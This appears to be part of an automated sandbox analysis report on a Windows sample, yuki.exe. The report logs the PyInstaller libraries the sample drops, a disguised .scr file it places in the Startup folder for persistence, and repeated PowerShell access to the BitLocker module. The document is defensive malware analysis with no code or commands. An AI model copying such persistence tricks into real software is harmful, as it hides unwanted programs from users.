Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\pywin32_system32\pywintypes312.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\cv2\opencv_videoio_ffmpeg4100_64.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\select.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\lz4\_version.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\win32\win32pdh.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\zstandard\_cffi.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\lz4\block\_block.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\select.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI62402\pycountry-24.6.1.dist-info\LICENSE.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrFile created: C:\Users\user\AppData\Local\Temp\_MEI6482\pycountry-24.6.1.dist-info\LICENSE.txt

Boot Survival

barindex
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to behavior
Source: C:\Users\user\Desktop\yuki.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\yuki.exeCode function: 0_2_00007FF6C81F76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6C81F76C0
Source: C:\Users\user\Desktop\yuki.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
